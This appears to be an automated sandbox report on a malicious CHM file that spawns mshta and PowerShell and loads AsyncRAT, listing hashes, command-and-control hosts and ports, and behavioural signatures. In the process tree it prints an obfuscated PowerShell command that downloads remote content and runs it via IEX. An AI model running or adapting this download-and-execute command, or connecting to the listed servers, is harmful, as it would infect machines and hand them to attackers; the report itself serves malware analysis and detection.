Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
09-10-2022 20:02
Static task
static1
Behavioral task
behavioral1
Sample
lol.chm
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
lol.chm
Resource
win10v2004-20220901-en
General
-
Target
lol.chm
-
Size
234KB
-
MD5
29984ec9b0bef9d92e9a2fec99e9b7d0
-
SHA1
701cdf5b2419f4da8247e6af9eaa376cdf6e2dc4
-
SHA256
9ad14a020dc9a937bbe2c2dcd63991e424fe174b96f0131962e24bdd9f823fa3
-
SHA512
be7703f487bccba2e473411288d1a2919358c49d18355f48aa5d73adb652550c33eeb9ca87dd786dbd46748c64c1af11e40ae6e342ef1b38dbe5fecdb667fe08
-
SSDEEP
6144:KveS9vg8qKoqjkqNdoYzgOS9vg8qKoqjkqDyoaF73:VSBg8iqjkCKUgOSBg8iqjkWaFT
Malware Config
Extracted
https://skynetx.com.br/tarefa.html
Extracted
asyncrat
| Edit 3LOSH RAT
AAAAAAAAAAAA+++AAAAAAAAAAAA
chromedata.accesscam.org:7707
chromedata.accesscam.org:4404
chromedata.accesscam.org:5505
chromedata.accesscam.org:3303
chromedata.accesscam.org:2222
chromedata.accesscam.org:6606
chromedata.accesscam.org:8808
chromedata.accesscam.org:5155
chromedata.accesscam.org:5122
chromedata.accesscam.org:8001
chromedata.accesscam.org:9000
chromedata.accesscam.org:9999
chromedata.accesscam.org:8888
cdt.3utilities.com:7707
cdt.3utilities.com:4404
cdt.3utilities.com:5505
cdt.3utilities.com:3303
cdt.3utilities.com:2222
cdt.3utilities.com:6606
cdt.3utilities.com:8808
cdt.3utilities.com:5155
cdt.3utilities.com:5122
cdt.3utilities.com:8001
cdt.3utilities.com:9000
cdt.3utilities.com:9999
cdt.3utilities.com:8888
adobedata.webredirect.org:7707
adobedata.webredirect.org:4404
adobedata.webredirect.org:5505
adobedata.webredirect.org:3303
adobedata.webredirect.org:2222
adobedata.webredirect.org:6606
adobedata.webredirect.org:8808
adobedata.webredirect.org:5155
adobedata.webredirect.org:5122
adobedata.webredirect.org:8001
adobedata.webredirect.org:9000
adobedata.webredirect.org:9999
adobedata.webredirect.org:8888
127.0.0.1:7707
127.0.0.1:4404
127.0.0.1:5505
127.0.0.1:3303
127.0.0.1:2222
127.0.0.1:6606
127.0.0.1:8808
127.0.0.1:5155
127.0.0.1:5122
127.0.0.1:8001
127.0.0.1:9000
127.0.0.1:9999
127.0.0.1:8888
dimascu.duckdns.org:7707
dimascu.duckdns.org:4404
dimascu.duckdns.org:5505
dimascu.duckdns.org:3303
dimascu.duckdns.org:2222
dimascu.duckdns.org:6606
dimascu.duckdns.org:8808
dimascu.duckdns.org:5155
dimascu.duckdns.org:5122
dimascu.duckdns.org:8001
dimascu.duckdns.org:9000
dimascu.duckdns.org:9999
dimascu.duckdns.org:8888
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
DesbravadorUpdata.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2768-138-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/2768-139-0x000000000040DD7E-mapping.dmp asyncrat -
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exeflow pid process 8 1904 mshta.exe 9 1904 mshta.exe 11 1904 mshta.exe 13 1904 mshta.exe 17 4584 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4584 set thread context of 2768 4584 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepid process 4584 powershell.exe 4584 powershell.exe 4584 powershell.exe 4584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4584 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 4100 hh.exe 4100 hh.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
hh.exemshta.exepowershell.exedescription pid process target process PID 4100 wrote to memory of 1904 4100 hh.exe mshta.exe PID 4100 wrote to memory of 1904 4100 hh.exe mshta.exe PID 1904 wrote to memory of 4584 1904 mshta.exe powershell.exe PID 1904 wrote to memory of 4584 1904 mshta.exe powershell.exe PID 4584 wrote to memory of 3664 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 3664 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 3664 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 2768 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 2768 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 2768 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 2768 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 2768 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 2768 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 2768 4584 powershell.exe RegSvcs.exe PID 4584 wrote to memory of 2768 4584 powershell.exe RegSvcs.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\lol.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://skynetx.com.br/tarefa.html2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $kaoskdoaksd = [System.NET.WebRequest]::Create('https://msantosm.com.br/logo.png');$ajdiasjdijasd = $kaoskdoaksd.GetResponse();$KASDJASDU = ([System.IO.StreamReader]($ajdiasjdijasd.GetResponseStream())).ReadToEnd()| .('{1}{0}'-f'EX','I')3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1904-133-0x0000000000000000-mapping.dmp
-
memory/2768-138-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2768-139-0x000000000040DD7E-mapping.dmp
-
memory/4584-135-0x0000000000000000-mapping.dmp
-
memory/4584-136-0x000001F5279B0000-0x000001F5279D2000-memory.dmpFilesize
136KB
-
memory/4584-137-0x000001F50E7C0000-0x000001F50F281000-memory.dmpFilesize
10.8MB
-
memory/4584-140-0x000001F50E7C0000-0x000001F50F281000-memory.dmpFilesize
10.8MB